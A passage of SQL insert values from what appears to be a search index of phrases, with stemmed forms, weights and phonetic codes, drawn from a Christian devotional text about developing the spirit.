(297446, 'beloved build up', 'belov build up', 0, 1, 1.5333, 'B4131431', 1, '*'),
(297447, 'beloved building', 'belov building', 0, 1, 1.5333, 'B41314352', 1, '*'),
(297448, 'beloved building yourselves', 'belov building yourselves', 0, 1, 1.9, 'B4131435262412', 1, '*'),
(297449, 'beloved know', 'belov know', 0, 1, 1.4, 'B41325', 1, '*'),
(297450, 'beloved know that', 'belov know that', 0, 1, 1.5667, 'B413253', 1, '*'),
(297451, 'body and soul', 'bodi and soul', 0, 1, 1.4333, 'B35324', 1, '*'),
(297452, 'body and your', 'bodi and your', 0, 1, 1.4333, 'B3536', 1, '*'),
(297453, 'body but', 'bodi but', 0, 1, 1.2667, 'B313', 1, '*'),
(297454, 'body but the', 'bodi but the', 0, 1, 1.4, 'B313', 1, '*'),
(297455, 'body the', 'bodi the', 0, 1, 1.2667, 'B300', 1, '*'),
(297456, 'body the soul', 'bodi the soul', 0, 1, 1.4333, 'B324', 1, '*'),
(297457, 'body therefore', 'bodi therefore', 0, 1, 1.4667, 'B3616', 1, '*'),
(297458, 'body therefore your', 'bodi therefore your', 0, 1, 1.6333, 'B3616', 1, '*'),
(297459, 'body your', 'bodi your', 0, 1, 1.3, 'B360', 1, '*'),
(297460, 'body your conscience', 'bodi your conscience', 0, 1, 1.6667, 'B3625252', 1, '*'),
(297461, 'body your spirit', 'bodi your spirit', 0, 1, 1.5333, 'B362163', 1, '*'),
(297462, 'born-again', 'born-again', 0, 0, 0.6667, 'B6525', 2, '*'),
(297463, 'born-again brings', 'born-again brings', 0, 1, 1.5667, 'B65251652', 1, '*'),
(297464, 'born-again brings your', 'born-again brings your', 0, 1, 1.7333, 'B652516526', 1, '*'),
(297465, 'born-again is', 'born-again is', 0, 1, 1.4333, 'B65252', 1, '*'),
(297466, 'born-again is the', 'born-again is the', 0, 1, 1.5667, 'B652523', 1, '*'),
(297467, 'bread alone', 'bread alone', 0, 1, 1.3667, 'B6345', 1, '*'),
(297468, 'bread alone but', 'bread alone but', 0, 1, 1.5, 'B634513', 1, '*'),
(297469, 'brings your', 'bring your', 0, 1, 1.3667, 'B6526', 1, '*'),
(297470, 'brings your spirit', 'bring your spirit', 0, 1, 1.6, 'B65262163', 1, '*'),
(297471, 'broken spirit', 'broken spirit', 0, 1, 1.4333, 'B6252163', 1, '*'),
(297472, 'broken spirit it', 'broken spirit it', 0, 1, 1.5333, 'B6252163', 1, '*'),
(297473, 'broken spirit pro', 'broken spirit pro', 0, 1, 1.5667, 'B625216316', 1, '*'),
(297474, 'build on', 'build on', 0, 1, 1.2667, 'B435', 1, '*'),
(297475, 'build on 2', 'build on 2', 0, 1, 1.3333, 'B435', 1, '*'),
(297476, 'building yourselves', 'build yourselves', 0, 1, 1.6333, 'B435262412', 1, '*'),
(297477, 'building yourselves up', 'build yourselves up', 0, 1, 1.7333, 'B4352624121', 1, '*'),
(297478, 'builds up', 'build up', 0, 1, 1.3, 'B4321', 1, '*'),
(297479, 'builds up your', 'build up your', 0, 1, 1.4667, 'B43216', 1, '*'),
(297480, 'but because he', 'but because he', 0, 1, 1.4667, 'B312', 1, '*'),
(297481, 'but by every', 'but by every', 0, 1, 1.4, 'B316', 1, '*'),
(297482, 'but the spirit', 'but the spirit', 0, 1, 1.4667, 'B32163', 1, '*'),
(297483, 'but the spiritual', 'but the spiritual', 0, 1, 1.5667, 'B321634', 1, '*'),
(297484, 'but who can', 'but who can', 0, 1, 1.3667, 'B325', 1, '*'),
(297485, 'by bread', 'by bread', 0, 1, 1.2667, 'B630', 1, '*'),
(297486, 'by bread alone', 'by bread alone', 0, 1, 1.4667, 'B6345', 1, '*'),
(297487, 'by every', 'by every', 0, 1, 1.2667, 'B600', 1, '*'),
(297488, 'by every word', 'by every word', 0, 1, 1.4333, 'B630', 1, '*'),
(297489, 'by praying in', 'by praying in', 0, 1, 1.4333, 'B6525', 1, '*'),
(297490, 'can almost', 'can almost', 0, 1, 1.3333, 'C54523', 1, '*'),
(297491, 'can almost always', 'can almost always', 0, 1, 1.5667, 'C5452342', 1, '*'),
(297492, 'can bear', 'can bear', 0, 1, 1.2667, 'C516', 1, '*'),
(297493, 'can bear a', 'can bear a', 0, 1, 1.3333, 'C516', 1, '*'),
(297494, 'can obtain those', 'can obtain those', 0, 1, 1.5333, 'C513532', 1, '*'),
(297495, 'can take you', 'can take you', 0, 1, 1.4, 'C532', 1, '*'),
(297496, 'cannot lead', 'cannot lead', 0, 1, 1.3667, 'C5343', 1, '*'),
(297497, 'cannot lead your', 'cannot lead your', 0, 1, 1.5333, 'C53436', 1, '*'),
(297498, 'care of', 'care of', 0, 1, 1.2333, 'C610', 1, '*'),
(297499, 'care of your', 'care of your', 0, 1, 1.4, 'C616', 1, '*'),
(297500, 'causes your', 'caus your', 0, 1, 1.3667, 'C600', 1, '*'),
(297501, 'causes your spirit', 'caus your spirit', 0, 1, 1.6, 'C62163', 1, '*'),
(297502, 'cerebral', 'cerebr', 0, 0, 0.5333, 'C6164', 1, '*'),
(297503, 'cerebral and', 'cerebr and', 0, 1, 1.4, 'C616453', 1, '*'),
(297504, 'cerebral and can', 'cerebr and can', 0, 1, 1.5333, 'C61645325', 1, '*'),
(297505, 'certain believers', 'certain believers', 0, 1, 1.5667, 'C63514162', 1, '*'),
(297506, 'certain believers are', 'certain believers are', 0, 1, 1.7, 'C635141626', 1, '*'),
(297507, 'christian and as', 'christian and as', 0, 1, 1.5333, 'C623532', 1, '*'),
(297508, 'christian and every', 'christian and every', 0, 1, 1.6333, 'C6235316', 1, '*'),
(297509, 'christian must understand', 'christian must understand', 0, 1, 1.8333, 'C6235235362353', 1, '*'),
(297510, 'communes', 'commun', 0, 0, 0.5333, 'C520', 1, '*'),
(297511, 'communes with', 'commun with', 0, 1, 1.4333, 'C523', 1, '*'),
(297512, 'communes with god', 'commun with god', 0, 1, 1.5667, 'C52323', 1, '*'),
(297513, 'confess the', 'confess the', 0, 1, 1.3667, 'C5123', 1, '*'),
(297514, 'confess the word', 'confess the word', 0, 1, 1.5333, 'C512363', 1, '*'),
(297515, 'conscience awakens', 'conscienc awakens', 0, 1, 1.6, 'C525252', 1, '*'),
(297516, 'conscience awakens and', 'conscienc awakens and', 0, 1, 1.7333, 'C52525253', 1, '*'),
(297517, 'constantly', 'constantli', 0, 0, 0.6667, 'C523534', 1, '*'),
(297518, 'constantly opened', 'constantli opened', 0, 1, 1.5667, 'C523534153', 1, '*'),
(297519, 'constantly opened to', 'constantli opened to', 0, 1, 1.6667, 'C523534153', 1, '*'),
(297520, 'crown', 'crown', 0, 0, 0.3333, 'C650', 1, '*'),
(297521, 'crown were', 'crown were', 0, 1, 1.3333, 'C656', 1, '*'),
(297522, 'crown were placed', 'crown were placed', 0, 1, 1.5667, 'C6561423', 1, '*'),
(297523, 'dearly beloved build', 'dearli beloved build', 0, 1, 1.6667, 'D641413143', 1, '*'),
(297524, 'decisions are', 'decis are', 0, 1, 1.4333, 'D2526', 1, '*'),
(297525, 'decisions are more', 'decis are more', 0, 1, 1.6, 'D252656', 1, '*'),
(297526, 'declare the', 'declar the', 0, 1, 1.3667, 'D2463', 1, '*'),
(297527, 'declare the word', 'declar the word', 0, 1, 1.5333, 'D246363', 1, '*'),
(297528, 'depend on the', 'depend on the', 0, 1, 1.4333, 'D15353', 1, '*'),
(297529, 'depend to', 'depend to', 0, 1, 1.3, 'D153', 1, '*'),
(297530, 'depend to take', 'depend to take', 0, 1, 1.4667, 'D1532', 1, '*'),
(297531, 'develop your spirit', 'develop your spirit', 0, 1, 1.6333, 'D14162163', 1, '*'),
(297532, 'developing your', 'develop your', 0, 1, 1.5, 'D141526', 1, '*'),
(297533, 'developing your spirit', 'develop your spirit', 0, 1, 1.7333, 'D1415262163', 1, '*'),
(297534, 'difficult times', 'difficult times', 0, 1, 1.5, 'D124352', 1, '*'),
(297535, 'difficult times but', 'difficult times but', 0, 1, 1.6333, 'D12435213', 1, '*'),
(297536, 'doing these', 'do these', 0, 1, 1.3667, 'D5232', 1, '*'),
(297537, 'doing these will', 'do these will', 0, 1, 1.5333, 'D52324', 1, '*'),
(297538, 'dominion', 'dominion', 0, 0, 0.5333, 'D500', 1, '*'),
(297539, 'dominion only', 'dominion only', 0, 1, 1.4333, 'D540', 1, '*'),
(297540, 'dominion only a', 'dominion only a', 0, 1, 1.5, 'D540', 1, '*'),
(297541, 'edifice', 'edific', 0, 0, 0.4667, 'E312', 1, '*'),
(297542, 'edifice 4', 'edific 4', 0, 1, 1.3, 'E312', 1, '*'),
(297543, 'edifice 4 worship', 'edific 4 worship', 0, 1, 1.5667, 'E312621', 1, '*'),
(297544, 'effectively it', 'effect it', 0, 1, 1.4667, 'E123143', 1, '*'),
(297545, 'effectively it must', 'effect it must', 0, 1, 1.6333, 'E123143523', 1, '*'),
(297546, 'emotion-led', 'emotion-l', 0, 0, 0.7333, 'E53543', 1, '*'),
(297547, 'emotion-led believers', 'emotion-l believers', 0, 1, 1.7, 'E5354314162', 1, '*'),
(297548, 'emotion-led believers always', 'emotion-l believers always', 0, 1, 1.9333, 'E535431416242', 1, '*'),
(297549, 'emotional god', 'emot god', 0, 1, 1.4333, 'E535423', 1, '*'),
(297550, 'emotional god is', 'emot god is', 0, 1, 1.5333, 'E5354232', 1, '*'),
(297551, 'emotional their', 'emot their', 0, 1, 1.5, 'E535436', 1, '*'),
(297552, 'emotional their decisions', 'emot their decisions', 0, 1, 1.8333, 'E5354363252', 1, '*'),
(297553, 'emotionally', 'emotion', 0, 0, 0.7333, 'E5354', 1, '*'),
(297554, 'emotionally based', 'emotion based', 0, 1, 1.5667, 'E5354123', 1, '*'),
(297555, 'emotionally based than', 'emotion based than', 0, 1, 1.7333, 'E53541235', 1, '*'),
(297556, 'emotions these', 'emot these', 0, 1, 1.4667, 'E535232', 1, '*'),
(297557, 'emotions these can', 'emot these can', 0, 1, 1.6, 'E5352325', 1, '*'),
(297558, 'every christian and', 'everi christian and', 0, 1, 1.6333, 'E16262353', 1, '*'),
(297559, 'every human', 'everi human', 0, 1, 1.3667, 'E165', 2, '*'),
(297560, 'every human being', 'everi human being', 0, 1, 1.5667, 'E165152', 2, '*'),
(297561, 'every move', 'everi move', 0, 1, 1.3333, 'E1651', 1, '*'),
(297562, 'every move of', 'everi move of', 0, 1, 1.4333, 'E1651', 1, '*'),
(297563, 'every word', 'everi word', 0, 1, 1.3333, 'E163', 1, '*'),
(297564, 'every word that', 'everi word that', 0, 1, 1.5, 'E163', 1, '*'),
(297565, 'excellent', 'excel', 0, 0, 0.6, 'E2453', 1, '*'),
(297566, 'excellent the', 'excel the', 0, 1, 1.4333, 'E2453', 1, '*'),
(297567, 'excellent the stronger', 'excel the stronger', 0, 1, 1.7333, 'E2453236526', 1, '*'),
(297568, 'exercise your', 'exercis your', 0, 1, 1.4333, 'E2626', 1, '*'),
(297569, 'exercise your spirit', 'exercis your spirit', 0, 1, 1.6667, 'E26262163', 1, '*'),
(297570, 'explain every', 'explain every', 0, 1, 1.4333, 'E214516', 1, '*'),
(297571, 'explain every move', 'explain every move', 0, 1, 1.6, 'E21451651', 1, '*'),
(297572, 'faith praying', 'faith praying', 0, 1, 1.4333, 'F31652', 1, '*'),
(297573, 'faith praying in', 'faith praying in', 0, 1, 1.5333, 'F316525', 1, '*'),
(297574, 'father of', 'father of', 0, 1, 1.3, 'F361', 1, '*'),
(297575, 'father of all', 'father of all', 0, 1, 1.4333, 'F3614', 1, '*'),
(297576, 'father\'s heart 20', 'father heart 20', 0, 1, 1.5667, 'F36263', 1, '*'),
(297577, 'fatten', 'fatten', 0, 0, 0.4, 'F350', 1, '*'),
(297578, 'fatten your', 'fatten your', 0, 1, 1.3667, 'F356', 1, '*'),
(297579, 'fatten your spirit', 'fatten your spirit', 0, 1, 1.6, 'F3562163', 1, '*'),
(297580, 'feed', 'feed', 0, 0, 0.2667, 'F300', 2, '*'),
(297581, 'feed your', 'feed your', 0, 1, 1.3, 'F360', 1, '*'),
(297582, 'feed your spirit', 'feed your spirit', 0, 1, 1.5333, 'F362163', 1, '*'),
(297583, 'fellowship with god', 'fellowship with god', 0, 1, 1.6333, 'F421323', 2, '*'),
(297584, 'fellowship with god\'s', 'fellowship with god', 0, 1, 1.7, 'F4213232', 1, '*'),
(297585, 'fellowship with other', 'fellowship with other', 0, 1, 1.7, 'F42136', 1, '*'),
(297586, 'fellowship with stupid', 'fellowship with stupid', 0, 1, 1.7333, 'F42132313', 1, '*'),
(297587, 'fellowships', 'fellowship', 0, 0, 0.7333, 'F4212', 1, '*'),
(297588, 'fellowships are', 'fellowship are', 0, 1, 1.5, 'F42126', 1, '*'),
(297589, 'fellowships are ways', 'fellowship are ways', 0, 1, 1.6667, 'F421262', 1, '*'),
(297590, 'finger', 'finger', 0, 0, 0.4, 'F526', 1, '*'),
(297591, 'finger and', 'finger and', 0, 1, 1.3333, 'F52653', 1, '*'),
(297592, 'finger and head', 'finger and head', 0, 1, 1.5, 'F52653', 1, '*'),
(297593, 'first step to', 'first step to', 0, 1, 1.4333, 'F6232313', 1, '*'),
(297594, 'flow from', 'flow from', 0, 1, 1.3, 'F4165', 1, '*'),
(297595, 'flow from god', 'flow from god', 0, 1, 1.4333, 'F416523', 1, '*'),
(297596, 'foolish', 'foolish', 0, 0, 0.4667, 'F420', 2, '*'),
(297597, 'foolish things', 'foolish things', 0, 1, 1.4667, 'F42352', 1, '*'),
(297598, 'foolish things as', 'foolish things as', 0, 1, 1.5667, 'F42352', 1, '*'),
(297599, 'foundation upon', 'foundat upon', 0, 1, 1.5, 'F53515', 1, '*'),
(297600, 'foundation upon which', 'foundat upon which', 0, 1, 1.7, 'F535152', 1, '*'),
(297601, 'from god you', 'from god you', 0, 1, 1.4, 'F6523', 1, '*'),
(297602, 'from pollutions', 'from pollutions', 0, 1, 1.5, 'F6514352', 1, '*'),
(297603, 'from pollutions and', 'from pollutions and', 0, 1, 1.6333, 'F651435253', 1, '*'),
(297604, 'from the mouth', 'from the mouth', 0, 1, 1.4667, 'F65353', 1, '*'),
(297605, 'getting born-again', 'get born-again', 0, 1, 1.6, 'G35216525', 1, '*'),
(297606, 'getting born-again brings', 'get born-again brings', 0, 1, 1.8333, 'G352165251652', 1, '*'),
(297607, 'getting born-again is', 'get born-again is', 0, 1, 1.7, 'G352165252', 1, '*'),
(297608, 'ghost jude', 'ghost jude', 0, 1, 1.3333, 'G323', 1, '*'),
(297609, 'ghost jude 20', 'ghost jude 20', 0, 1, 1.4333, 'G323', 1, '*'),
(297610, 'give it life', 'give it life', 0, 1, 1.4, 'G1341', 1, '*'),
(297611, 'god away as', 'god away as', 0, 1, 1.3667, 'G320', 1, '*'),
(297612, 'god builds', 'god builds', 0, 1, 1.3333, 'G31432', 1, '*'),
(297613, 'god builds up', 'god builds up', 0, 1, 1.4333, 'G314321', 1, '*'),
(297614, 'god fellowship', 'god fellowship', 0, 1, 1.4667, 'G31421', 1, '*'),
(297615, 'god fellowship with', 'god fellowship with', 0, 1, 1.6333, 'G314213', 1, '*'),
(297616, 'god he made', 'god he made', 0, 1, 1.3667, 'G353', 1, '*'),
(297617, 'god if your', 'god if your', 0, 1, 1.3667, 'G316', 1, '*'),
(297618, 'god in life', 'god in life', 0, 1, 1.3667, 'G3541', 1, '*'),
(297619, 'god is spiritual', 'god is spiritual', 0, 1, 1.5333, 'G321634', 1, '*'),
(297620, 'god you therefore', 'god you therefore', 0, 1, 1.5667, 'G3616', 1, '*'),
(297621, 'god\'s plan is', 'god plan is', 0, 1, 1.4333, 'G321452', 1, '*'),
(297622, 'god\'s servant revolusola', 'god servant revolusola', 0, 1, 1.8, 'G32615361424', 1, '*'),
(297623, 'god\'s word beloved', 'god word beloved', 0, 1, 1.6, 'G32631413', 1, '*'),
(297624, 'god\'s word fellowship', 'god word fellowship', 0, 1, 1.7, 'G32631421', 1, '*'),
(297625, 'god\'s word hear', 'god word hear', 0, 1, 1.5, 'G32636', 1, '*'),
(297626, 'god\'s word to', 'god word to', 0, 1, 1.4333, 'G3263', 1, '*'),
(297627, 'god.”\'”', 'god.”', 0, 0, 0.4667, 'G300', 1, '*'),
(297628, 'god.”\'” your', 'god.” your', 0, 1, 1.4, 'G360', 1, '*'),
(297629, 'god.”\'” your spirit', 'god.” your spirit', 0, 1, 1.6333, 'G362163', 1, '*'),
(297630, 'had a strong', 'had a strong', 0, 1, 1.4, 'H323652', 1, '*'),
(297631, 'has 3', 'ha 3', 0, 1, 1.1667, 'H200', 1, '*'),
(297632, 'has 3 parts', 'ha 3 parts', 0, 1, 1.3667, 'H21632', 1, '*'),
(297633, 'has a soul', 'ha a soul', 0, 1, 1.3333, 'H240', 1, '*'),
(297634, 'has a tripartite', 'ha a tripartite', 0, 1, 1.5333, 'H236163', 1, '*'),
(297635, 'has many', 'ha many', 0, 1, 1.2667, 'H250', 1, '*'),
(297636, 'has many parts', 'ha many parts', 0, 1, 1.4667, 'H251632', 1, '*'),
(297637, 'have a template', 'have a template', 0, 1, 1.5, 'H135143', 1, '*'),
(297638, 'he answered and', 'he answered and', 0, 1, 1.5, 'H526353', 1, '*'),
(297639, 'he had a', 'he had a', 0, 1, 1.2667, 'H300', 1, '*'),
(297640, 'he made', 'he made', 0, 1, 1.2333, 'H530', 1, '*'),
(297641, 'he made your', 'he made your', 0, 1, 1.4, 'H536', 1, '*'),
(297642, 'he sat', 'he sat', 0, 1, 1.2, 'H230', 1, '*'),
(297643, 'he sat on', 'he sat on', 0, 1, 1.3, 'H235', 1, '*'),
(297644, 'he was able', 'he was able', 0, 1, 1.3667, 'H214', 1, '*'),
(297645, 'head respectively', 'head respectively', 0, 1, 1.5667, 'H36212314', 1, '*'),
(297646, 'head respectively these', 'head respectively these', 0, 1, 1.7667, 'H3621231432', 1, '*'),
(297647, 'hear the word', 'hear the word', 0, 1, 1.4333, 'H6363', 1, '*'),
(297648, 'heart 20', 'heart 20', 0, 1, 1.2667, 'H630', 1, '*'),
(297649, 'heart 20 03', 'heart 20 03', 0, 1, 1.3667, 'H630', 1, '*'),
(297650, 'heb 12', 'heb 12', 0, 1, 1.2, 'H100', 1, '*'),
(297651, 'heb 12 23b', 'heb 12 23b', 0, 1, 1.3333, 'H100', 1, '*'),
(297652, 'highly cerebral', 'highli cerebral', 0, 1, 1.5, 'H2426164', 1, '*'),
(297653, 'highly cerebral and', 'highli cerebral and', 0, 1, 1.6333, 'H242616453', 1, '*'),
(297654, 'him in sickness', 'him in sickness', 0, 1, 1.5, 'H5252', 1, '*'),
(297655, 'his finger', 'hi finger', 0, 1, 1.3333, 'H21526', 1, '*'),
(297656, 'his finger and', 'hi finger and', 0, 1, 1.4667, 'H2152653', 1, '*'),
(297657, 'his throne', 'hi throne', 0, 1, 1.3333, 'H2365', 1, '*'),
(297658, 'his throne and', 'hi throne and', 0, 1, 1.4667, 'H23653', 1, '*'),
(297659, 'holy faith', 'holi faith', 0, 1, 1.3333, 'H413', 1, '*'),
(297660, 'holy faith praying', 'holi faith praying', 0, 1, 1.6, 'H4131652', 1, '*'),
(297661, 'holy ghost jude', 'holi ghost jude', 0, 1, 1.5, 'H42323', 1, '*'),
(297662, 'holy spirit.”', 'holi spirit.”', 0, 1, 1.4333, 'H42163', 1, '*'),
(297663, 'holy spirit.” praying', 'holi spirit.” praying', 0, 1, 1.7, 'H421631652', 1, '*'),
(297664, 'how the other', 'how the other', 0, 1, 1.4333, 'H360', 1, '*'),
(297665, 'however a', 'howev a', 0, 1, 1.3, 'H160', 1, '*'),
(297666, 'however a weak', 'howev a weak', 0, 1, 1.4667, 'H162', 1, '*'),
(297667, 'human being has', 'human being has', 0, 1, 1.5, 'H5152', 1, '*'),
(297668, 'if your spirit', 'if your spirit', 0, 1, 1.4667, 'I162163', 1, '*'),
(297669, 'in a body', 'in a body', 0, 1, 1.3, 'I513', 2, '*'),
(297670, 'in every christian', 'in every christian', 0, 1, 1.6, 'I51626235', 1, '*'),
(297671, 'in life because', 'in life because', 0, 1, 1.5, 'I5412', 1, '*'),
(297672, 'in life joseph', 'in life joseph', 0, 1, 1.4667, 'I54121', 1, '*'),
(297673, 'in memorise', 'in memorise', 0, 1, 1.3667, 'I562', 1, '*'),
(297674, 'in memorise the', 'in memorise the', 0, 1, 1.5, 'I5623', 1, '*'),
(297675, 'in sickness', 'in sickness', 0, 1, 1.3667, 'I5252', 1, '*'),
(297676, 'in sickness but', 'in sickness but', 0, 1, 1.5, 'I525213', 1, '*'),
(297677, 'in your inner', 'in your inner', 0, 1, 1.4333, 'I5656', 1, '*'),
(297678, 'include 1', 'includ 1', 0, 1, 1.3, 'I5243', 1, '*'),
(297679, 'include 1 give', 'includ 1 give', 0, 1, 1.4667, 'I524321', 1, '*'),
(297680, 'influential', 'influenti', 0, 0, 0.7333, 'I514534', 1, '*'),
(297681, 'influential your', 'influenti your', 0, 1, 1.5333, 'I5145346', 1, '*'),
(297682, 'influential your life', 'influenti your life', 0, 1, 1.7, 'I514534641', 1, '*'),
(297683, 'inner man', 'inner man', 0, 1, 1.3, 'I565', 1, '*'),
(297684, 'inner man prioritize', 'inner man prioritize', 0, 1, 1.6667, 'I5651632', 1, '*'),
(297685, 'inner man you', 'inner man you', 0, 1, 1.4333, 'I565', 1, '*'),
(297686, 'inyour', 'inyour', 0, 0, 0.4, 'I560', 1, '*'),
(297687, 'inyour inner', 'inyour inner', 0, 1, 1.4, 'I5656', 1, '*'),
(297688, 'inyour inner man', 'inyour inner man', 0, 1, 1.5333, 'I56565', 1, '*'),
(297689, 'is a need', 'is a need', 0, 1, 1.3, 'I253', 1, '*'),
(297690, 'is not emotional', 'is not emotional', 0, 1, 1.5333, 'I2535354', 1, '*'),
(297691, 'is spiritual steps', 'is spiritual steps', 0, 1, 1.6, 'I216342312', 1, '*'),
(297692, 'is that part', 'is that part', 0, 1, 1.4, 'I23163', 1, '*'),
(297693, 'is the first', 'is the first', 0, 1, 1.4, 'I231623', 1, '*'),
(297694, 'is the foundation', 'is the foundation', 0, 1, 1.5667, 'I231535', 1, '*'),
(297695, 'is the leader', 'is the leader', 0, 1, 1.4333, 'I23436', 1, '*'),
(297696, 'is the real', 'is the real', 0, 1, 1.3667, 'I2364', 1, '*'),
(297697, 'is upon', 'is upon', 0, 1, 1.2333, 'I215', 1, '*'),
(297698, 'is upon this', 'is upon this', 0, 1, 1.4, 'I21532', 1, '*'),
(297699, 'is written “man', 'is written “man', 0, 1, 1.5, 'I2635', 1, '*'),
(297700, 'is your seat', 'is your seat', 0, 1, 1.4, 'I2623', 1, '*'),
(297701, 'it in memorise', 'it in memorise', 0, 1, 1.4667, 'I3562', 1, '*'),
(297702, 'it is upon', 'it is upon', 0, 1, 1.3333, 'I3215', 1, '*'),
(297703, 'it life', 'it life', 0, 1, 1.2333, 'I341', 1, '*'),
(297704, 'it life getting', 'it life getting', 0, 1, 1.5, 'I3412352', 1, '*'),
(297705, 'it robust', 'it robust', 0, 1, 1.3, 'I36123', 1, '*'),
(297706, 'it robust 3', 'it robust 3', 0, 1, 1.3667, 'I36123', 1, '*'),
(297707, 'it takes a', 'it takes a', 0, 1, 1.3333, 'I320', 1, '*'),
(297708, 'item 33', 'item 33', 0, 1, 1.2333, 'I350', 1, '*'),
(297709, 'item 33 from', 'item 33 from', 0, 1, 1.4, 'I35165', 1, '*'),
(297710, 'joseph because', 'joseph because', 0, 1, 1.4667, 'J120', 1, '*'),
(297711, 'joseph because these', 'joseph because these', 0, 1, 1.6667, 'J1232', 1, '*'),
(297712, 'joseph went', 'joseph went', 0, 1, 1.3667, 'J153', 1, '*'),
(297713, 'joseph went through', 'joseph went through', 0, 1, 1.6333, 'J15362', 1, '*'),
(297714, 'joseph will', 'joseph will', 0, 1, 1.3667, 'J140', 1, '*'),
(297715, 'joseph will flow', 'joseph will flow', 0, 1, 1.5333, 'J1414', 1, '*'),
(297716, 'joseph you', 'joseph you', 0, 1, 1.3333, 'J100', 1, '*'),
(297717, 'joseph you cannot', 'joseph you cannot', 0, 1, 1.5667, 'J1253', 1, '*'),
(297718, 'jude 20', 'jude 20', 0, 1, 1.2333, 'J300', 1, '*'),
(297719, 'jude 20 says', 'jude 20 says', 0, 1, 1.4, 'J320', 1, '*'),
(297720, 'just a body', 'just a body', 0, 1, 1.3667, 'J313', 1, '*'),
(297721, 'just emotional', 'just emotional', 0, 1, 1.4667, 'J35354', 1, '*'),
(297722, 'just emotional their', 'just emotional their', 0, 1, 1.6667, 'J3535436', 1, '*'),
(297723, 'just men', 'just men', 0, 1, 1.2667, 'J350', 1, '*'),
(297724, 'just men made', 'just men made', 0, 1, 1.4333, 'J353', 1, '*'),
(297725, 'k2 item 33', 'k2 item 33', 0, 1, 1.3333, 'K350', 1, '*'),
(297726, 'know that you', 'know that you', 0, 1, 1.4333, 'K530', 1, '*'),
(297727, 'lead you through', 'lead you through', 0, 1, 1.5333, 'L362', 1, '*'),
(297728, 'lead your', 'lead your', 0, 1, 1.3, 'L360', 1, '*'),
(297729, 'lead your body', 'lead your body', 0, 1, 1.4667, 'L3613', 1, '*'),
(297730, 'lead your soul', 'lead your soul', 0, 1, 1.4667, 'L3624', 1, '*'),
(297731, 'leader however', 'leader however', 0, 1, 1.4667, 'L3616', 1, '*'),
(297732, 'leader however a', 'leader however a', 0, 1, 1.5333, 'L3616', 1, '*'),
(297733, 'life because god', 'life because god', 0, 1, 1.5333, 'L123', 1, '*'),
(297734, 'life certain', 'life certain', 0, 1, 1.4, 'L12635', 1, '*'),
(297735, 'life certain believers', 'life certain believers', 0, 1, 1.7333, 'L1263514162', 1, '*'),
(297736, 'life depend', 'life depend', 0, 1, 1.3667, 'L13153', 1, '*'),
(297737, 'life depend on', 'life depend on', 0, 1, 1.4667, 'L131535', 1, '*'),
(297738, 'life depend to', 'life depend to', 0, 1, 1.4667, 'L13153', 1, '*'),
(297739, 'life getting', 'life getting', 0, 1, 1.4, 'L12352', 1, '*'),
(297740, 'life getting born-again', 'life getting born-again', 0, 1, 1.7667, 'L1235216525', 1, '*'),
(297741, 'life has many', 'life has many', 0, 1, 1.4333, 'L125', 1, '*'),
(297742, 'life is the', 'life is the', 0, 1, 1.3667, 'L123', 1, '*'),
(297743, 'life joseph', 'life joseph', 0, 1, 1.3667, 'L121', 1, '*'),
(297744, 'life joseph went', 'life joseph went', 0, 1, 1.5333, 'L12153', 1, '*'),
(297745, 'life the time', 'life the time', 0, 1, 1.4333, 'L135', 1, '*'),
(297746, 'life will be', 'life will be', 0, 1, 1.4, 'L141', 1, '*'),
(297747, 'life will stand', 'life will stand', 0, 1, 1.5, 'L142353', 1, '*'),
(297748, 'life you can\'t', 'life you can', 0, 1, 1.4667, 'L1253', 1, '*'),
(297749, 'life you need', 'life you need', 0, 1, 1.4333, 'L153', 1, '*'),
(297750, 'like an edifice', 'like an edifice', 0, 1, 1.5, 'L25312', 1, '*'),
(297751, 'live by bread', 'live by bread', 0, 1, 1.4333, 'L163', 1, '*'),
(297752, 'lives in', 'live in', 0, 1, 1.2667, 'L125', 2, '*'),
(297753, 'lives in a', 'live in a', 0, 1, 1.3333, 'L125', 2, '*'),
(297754, 'lot of difficult', 'lot of difficult', 0, 1, 1.5333, 'L3131243', 1, '*'),
(297755, 'made perfect', 'made perfect', 0, 1, 1.4, 'M316123', 1, '*'),
(297756, 'made perfect heb', 'made perfect heb', 0, 1, 1.5333, 'M3161231', 1, '*'),
(297757, 'made your', 'made your', 0, 1, 1.3, 'M360', 1, '*'),
(297758, 'made your spirit', 'made your spirit', 0, 1, 1.5333, 'M362163', 1, '*'),
(297759, 'make it robust', 'make it robust', 0, 1, 1.4667, 'M236123', 1, '*'),
(297760, 'man alive', 'man alive', 0, 1, 1.3, 'M410', 1, '*'),
(297761, 'man alive you', 'man alive you', 0, 1, 1.4333, 'M410', 1, '*'),
(297762, 'man and', 'man and', 0, 1, 1.2333, 'M300', 1, '*'),
(297763, 'man and reduce', 'man and reduce', 0, 1, 1.4667, 'M3632', 1, '*'),
(297764, 'man by', 'man by', 0, 1, 1.2, 'M100', 1, '*'),
(297765, 'man by praying', 'man by praying', 0, 1, 1.4667, 'M1652', 1, '*'),
(297766, 'man getting', 'man getting', 0, 1, 1.3667, 'M2352', 1, '*'),
(297767, 'man getting born-again', 'man getting born-again', 0, 1, 1.7333, 'M235216525', 1, '*'),
(297768, 'man has a', 'man has a', 0, 1, 1.3, 'M200', 1, '*'),
(297769, 'man in every', 'man in every', 0, 1, 1.4, 'M160', 1, '*'),
(297770, 'man include', 'man include', 0, 1, 1.3667, 'M243', 1, '*'),
(297771, 'man include 1', 'man include 1', 0, 1, 1.4333, 'M243', 1, '*'),
(297772, 'man is the', 'man is the', 0, 1, 1.3333, 'M230', 1, '*'),
(297773, 'man prioritize', 'man prioritize', 0, 1, 1.4667, 'M1632', 1, '*'),
(297774, 'man prioritize developing', 'man prioritize developing', 0, 1, 1.8333, 'M1632314152', 1, '*'),
(297775, 'man recognize', 'man recognize', 0, 1, 1.4333, 'M6252', 1, '*'),
(297776, 'man recognize that', 'man recognize that', 0, 1, 1.6, 'M62523', 1, '*'),
(297777, 'man to lead', 'man to lead', 0, 1, 1.3667, 'M343', 1, '*'),
(297778, 'man to rise', 'man to rise', 0, 1, 1.3667, 'M362', 1, '*'),
(297779, 'man will sustain', 'man will sustain', 0, 1, 1.5333, 'M4235', 1, '*'),
(297780, 'man you are', 'man you are', 0, 1, 1.3667, 'M600', 1, '*'),
(297781, 'many parts', 'mani parts', 0, 1, 1.3333, 'M1632', 1, '*'),
(297782, 'many parts but', 'mani parts but', 0, 1, 1.4667, 'M163213', 1, '*'),
(297783, 'matthew 4', 'matthew 4', 0, 1, 1.3, 'M300', 1, '*'),
